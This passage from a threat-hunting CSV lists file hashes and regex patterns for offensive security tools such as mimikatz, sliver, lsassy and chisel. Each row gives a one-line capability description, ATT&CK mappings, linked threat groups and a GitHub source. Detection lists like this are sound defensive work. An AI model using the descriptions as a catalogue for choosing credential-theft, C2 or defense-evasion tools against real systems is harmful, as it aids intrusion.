BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","34656" "*b3d610e1b65dc16e081de173a8ea83f9f0c40fb8bb5cf73e3206294b013485b4*",".{0,1000}b3d610e1b65dc16e081de173a8ea83f9f0c40fb8bb5cf73e3206294b013485b4.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","34658" "*b3d7df3faa7bbeddf70a0c3cb586ce3d38aa1bfd787da67dd2338ec72a27bb74*",".{0,1000}b3d7df3faa7bbeddf70a0c3cb586ce3d38aa1bfd787da67dd2338ec72a27bb74.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","34659" "*b3d8d191ad67acaae2773e5fcd477a265629902f364f5b6b51b308c6ee228a79*",".{0,1000}b3d8d191ad67acaae2773e5fcd477a265629902f364f5b6b51b308c6ee228a79.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34660" "*b3da8fb4ec21437e3a9b7118e9eb2da1a3b83fa202e546c64533d40e719263d7*",".{0,1000}b3da8fb4ec21437e3a9b7118e9eb2da1a3b83fa202e546c64533d40e719263d7.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","34661" "*b3eba9d048c4b7cd8e01d81baa74daf0eb097f584c946ac0ab10ba08de1a8d7b*",".{0,1000}b3eba9d048c4b7cd8e01d81baa74daf0eb097f584c946ac0ab10ba08de1a8d7b.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","34663" "*b3ed38872b50a110a8704d1d2eb4e6e47ed6f2998d1bd08b712f840cc3a4643a*",".{0,1000}b3ed38872b50a110a8704d1d2eb4e6e47ed6f2998d1bd08b712f840cc3a4643a.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","34665" "*b3f9b4b2534e4e7cf71b72d5f37b0745e0f6eda8ecc81c1e4139319f4cd56b34*",".{0,1000}b3f9b4b2534e4e7cf71b72d5f37b0745e0f6eda8ecc81c1e4139319f4cd56b34.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","34668" "*b3fc8195cc5265fe46562d4063d259fe5e56835b06f598be324af18c0adb39b1*",".{0,1000}b3fc8195cc5265fe46562d4063d259fe5e56835b06f598be324af18c0adb39b1.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","#filehash","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","34670" "*b3fd7e46fd54a5a6271012b29414c1ed3cc162b942d8693b88fff76acf312277*",".{0,1000}b3fd7e46fd54a5a6271012b29414c1ed3cc162b942d8693b88fff76acf312277.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34671" "*b3rito*yodo*",".{0,1000}b3rito.{0,1000}yodo.{0,1000}","offensive_tool_keyword","yodo","This tool proves how easy it is to become root via limited sudo permissions. via dirty COW or using Pa(th)zuzu. 
","T1068 - T1078 - T1529","TA0004 - TA0008","N/A","N/A","Exploitation tool","https://github.com/b3rito/yodo","1","1","N/A","N/A","N/A","3","207","22","2017-02-28T15:38:13Z","2016-11-13T21:02:03Z","34672" "*b40ecc66931f17246fa3d7571b293d86cdff0581364efb7405c5cb71873fc2a7*",".{0,1000}b40ecc66931f17246fa3d7571b293d86cdff0581364efb7405c5cb71873fc2a7.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","34673" "*b4136c74ef7fedac0f8f6f8261cad1544902d0c786ea3ef1cfade20c07a5e82a*",".{0,1000}b4136c74ef7fedac0f8f6f8261cad1544902d0c786ea3ef1cfade20c07a5e82a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34675" "*b41498d3c4883fb374dce5c9923c60b5ac901775909ae74d13a05851b80cc221*",".{0,1000}b41498d3c4883fb374dce5c9923c60b5ac901775909ae74d13a05851b80cc221.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","#filehash","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","34676" "*b4153afec8b3aa55877961a3cd2bb34defdd8cfb9524620cb640750d08e304ea*",".{0,1000}b4153afec8b3aa55877961a3cd2bb34defdd8cfb9524620cb640750d08e304ea.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform 
adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34677" "*b41554edc90ade1c7ce3553707cec2ce048b372e2ab960033b39dd3c65692261*",".{0,1000}b41554edc90ade1c7ce3553707cec2ce048b372e2ab960033b39dd3c65692261.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","34678" "*b416c391df9c944901ea74a04d71853eeabb63f41319efedca9506f6bc8f23e3*",".{0,1000}b416c391df9c944901ea74a04d71853eeabb63f41319efedca9506f6bc8f23e3.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","34679" "*b4239ef8e8962d393767152c150f17bc5cf0527d6fed52d489b444f46402650a*",".{0,1000}b4239ef8e8962d393767152c150f17bc5cf0527d6fed52d489b444f46402650a.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing 
graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","34681" "*b4278888f8ba29f27b4a289ee4aa382bd7b3e0ea8ffd0c8fd4038ad963d21113*",".{0,1000}b4278888f8ba29f27b4a289ee4aa382bd7b3e0ea8ffd0c8fd4038ad963d21113.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34682" "*b42f9571d486a8aef5b36d72c1c8fff83f29cac2f9c61aece3ad70537d49b222*",".{0,1000}b42f9571d486a8aef5b36d72c1c8fff83f29cac2f9c61aece3ad70537d49b222.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","34683" 
"*b430b05f0f5557426217c9a5a94f87521264b47398183c8715cd1615a7ed645e*",".{0,1000}b430b05f0f5557426217c9a5a94f87521264b47398183c8715cd1615a7ed645e.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","34684" "*b43587da7d68a081ddc3a46993f797782e813ed07ccc5f33fe37b14a653ccfed*",".{0,1000}b43587da7d68a081ddc3a46993f797782e813ed07ccc5f33fe37b14a653ccfed.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","#filehash","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","34686" "*b4365f5c1b052eda101ce80a2184f92fd3a0a4d9c48255fdb7042ea7a4810fd6*",".{0,1000}b4365f5c1b052eda101ce80a2184f92fd3a0a4d9c48255fdb7042ea7a4810fd6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","34687" "*b44f8cfa584427bc18a8712218a1ce31b78b706cbfb02b0248b11f40b097ba9a*",".{0,1000}b44f8cfa584427bc18a8712218a1ce31b78b706cbfb02b0248b11f40b097ba9a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34689" "*b453e2257ae08240b0fba5a6828aa119af8bc027e5fcb5600542d5d3c2706ab4*",".{0,1000}b453e2257ae08240b0fba5a6828aa119af8bc027e5fcb5600542d5d3c2706ab4.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34690" "*b45f9a6c21f34801656affa29c1633288fe44f859a120c3e1a69d3880ce4f617*",".{0,1000}b45f9a6c21f34801656affa29c1633288fe44f859a120c3e1a69d3880ce4f617.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","34691" "*b4726b5d0aa21ed0f06326fcf2f9bd0c6171c76b610287a357710174f06dea52*",".{0,1000}b4726b5d0aa21ed0f06326fcf2f9bd0c6171c76b610287a357710174f06dea52.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral 
Movement","https://github.com/0xthirteen/SharpRDP","1","0","#filehash","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","34696" "*B473B9A4135DE247C6D76510B40F63F8F1E5A2AB*",".{0,1000}B473B9A4135DE247C6D76510B40F63F8F1E5A2AB.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","34697" "*B474B962-A46B-4D35-86F3-E8BA120C88C0*",".{0,1000}B474B962\-A46B\-4D35\-86F3\-E8BA120C88C0.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","#GUIDproject","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","34699" "*b47a3b1087bfa77566ae4058f2e86abcd27ee42f3fda8d961ae96f871ff3506a*",".{0,1000}b47a3b1087bfa77566ae4058f2e86abcd27ee42f3fda8d961ae96f871ff3506a.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34700" "*b47e50a181795a89f5972e7a4c06bf93a81cb8b15fc173ffcb526bac16f71f09*",".{0,1000}b47e50a181795a89f5972e7a4c06bf93a81cb8b15fc173ffcb526bac16f71f09.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - 
KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","34702" "*b47edb3e68c611678e3226fe1a42a296d458b0dd282cc9a1f9e9dbaa313de98d*",".{0,1000}b47edb3e68c611678e3226fe1a42a296d458b0dd282cc9a1f9e9dbaa313de98d.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","34703" "*b4811fd8d4da079398d21dbb0e8b301ef75ff6a31e1ea2d9357c521a019d0c0e*",".{0,1000}b4811fd8d4da079398d21dbb0e8b301ef75ff6a31e1ea2d9357c521a019d0c0e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34706" "*b49250e1629e9241310ea0b4db1651be12ad0013e605bb1b5c57de826025ae41*",".{0,1000}b49250e1629e9241310ea0b4db1651be12ad0013e605bb1b5c57de826025ae41.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","34708" "*b494f44756f989b9f693bb1d69b3760a7ddef53a1f61b5754fd93db5449de1cd*",".{0,1000}b494f44756f989b9f693bb1d69b3760a7ddef53a1f61b5754fd93db5449de1cd.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - 
T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34709" "*b49abe3651b2e07c875f149d9931820ca27237d929814c94b2cfa32f1a445737*",".{0,1000}b49abe3651b2e07c875f149d9931820ca27237d929814c94b2cfa32f1a445737.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","34710" "*b49ec9495cebbc03139dd1e0a5ccc665760e1cc0770fd896077db21abc122b2b*",".{0,1000}b49ec9495cebbc03139dd1e0a5ccc665760e1cc0770fd896077db21abc122b2b.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","34711" "*b4a1ab9bd2528e57f4a018ac84934c6bdcd67aaaf269f76c15fa739432409f3b*",".{0,1000}b4a1ab9bd2528e57f4a018ac84934c6bdcd67aaaf269f76c15fa739432409f3b.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","34712" "*b4a463948663e6a142ddbbc35f9ef543da818497acfdf21c21ec2bd96bc53fa6*",".{0,1000}b4a463948663e6a142ddbbc35f9ef543da818497acfdf21c21ec2bd96bc53fa6.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated 
environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","#filehash","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","34714" "*b4a7045568cb78f48f42b93f528e14ef24f8dc3bf878af0b94ca22c5df546da5*",".{0,1000}b4a7045568cb78f48f42b93f528e14ef24f8dc3bf878af0b94ca22c5df546da5.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","#filehash","N/A","10","2","150","16","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z","34715" "*b4ac2390829f0e3a76c51692d27759ca7b83b4459c4707e86d59c72dbbbe36d3*",".{0,1000}b4ac2390829f0e3a76c51692d27759ca7b83b4459c4707e86d59c72dbbbe36d3.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","34718" "*b4af4df46eb9a169f197c093325d983db5dc0ab1eb6bd7aa67458e4f48c2e0b2*",".{0,1000}b4af4df46eb9a169f197c093325d983db5dc0ab1eb6bd7aa67458e4f48c2e0b2.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","34720" 
"*b4bcf5f83ad72c100e50a9590dd23bb35ac70a6331686e6c6a50339d608e671a*",".{0,1000}b4bcf5f83ad72c100e50a9590dd23bb35ac70a6331686e6c6a50339d608e671a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34721" "*b4bdf8ba2bfa4fdb140059b502dc0d7a84efe934cf1a251c23d89954aff38896*",".{0,1000}b4bdf8ba2bfa4fdb140059b502dc0d7a84efe934cf1a251c23d89954aff38896.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34722" "*b4c1fe4b72f4cfe5ee58e4196e4620eea2a70641a033c25d0cb96758ec672d7f*",".{0,1000}b4c1fe4b72f4cfe5ee58e4196e4620eea2a70641a033c25d0cb96758ec672d7f.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","34725" 
"*b4c70e7499e46ab28c305ce9937933ea2674a16df3686830f6016c9321e23b84*",".{0,1000}b4c70e7499e46ab28c305ce9937933ea2674a16df3686830f6016c9321e23b84.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","34726" "*b4c75048a8837dbad2a829e17a1370716cc40f9a6fd3b0f50df7f0e3f97564c1*",".{0,1000}b4c75048a8837dbad2a829e17a1370716cc40f9a6fd3b0f50df7f0e3f97564c1.{0,1000}","offensive_tool_keyword","Invoke-PSImage","Encodes a PowerShell script in the pixels of a PNG file and generates a oneliner to executenInvoke-PSImage takes a PowerShell script and encodes the bytes of the script into the pixels of a PNG image. 
It generates a oneliner for executing either from a file of from the web.","T1027.003 - T1027..009 - T1218 - T1216 - T1059","TA0005","N/A","Sandworm Team","Defense Evasion","https://github.com/peewpw/Invoke-PSImage","1","0","#filehash","N/A","7","10","2176","399","2019-09-23T15:17:03Z","2017-12-17T18:41:44Z","34727" "*b4ce5c82a51a7281bb0d04463c110471ca73f39813ed11c5c51d48d6cf7733e5*",".{0,1000}b4ce5c82a51a7281bb0d04463c110471ca73f39813ed11c5c51d48d6cf7733e5.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","0","#filehash","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","34729" "*b4d2e7159b1707d9355ac8699897c55441a25afebf66b4f47087b34d5e4994cb*",".{0,1000}b4d2e7159b1707d9355ac8699897c55441a25afebf66b4f47087b34d5e4994cb.{0,1000}","offensive_tool_keyword","SCCMVNC","A tool to modify SCCM remote control settings on the client machine - enabling remote control without permission prompts or notifications. 
This can be done without requiring access to SCCM server.","T1078 - T1562 - T1557","TA0005 - TA0003 - TA0008","N/A","N/A","Lateral Movement","https://github.com/netero1010/SCCMVNC","1","0","#filehash","N/A","8","1","87","10","2024-10-20T14:29:43Z","2024-10-20T14:15:28Z","34730" "*b4da4ba10fa5cd627400a6b35570527fbecdd499d7aab9beb1ec7a7016664d4f*",".{0,1000}b4da4ba10fa5cd627400a6b35570527fbecdd499d7aab9beb1ec7a7016664d4f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34732" "*b4dba70d556511c9a7dbf152960bd1e72c9149142f694f87d2d53b63d61a0803*",".{0,1000}b4dba70d556511c9a7dbf152960bd1e72c9149142f694f87d2d53b63d61a0803.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - 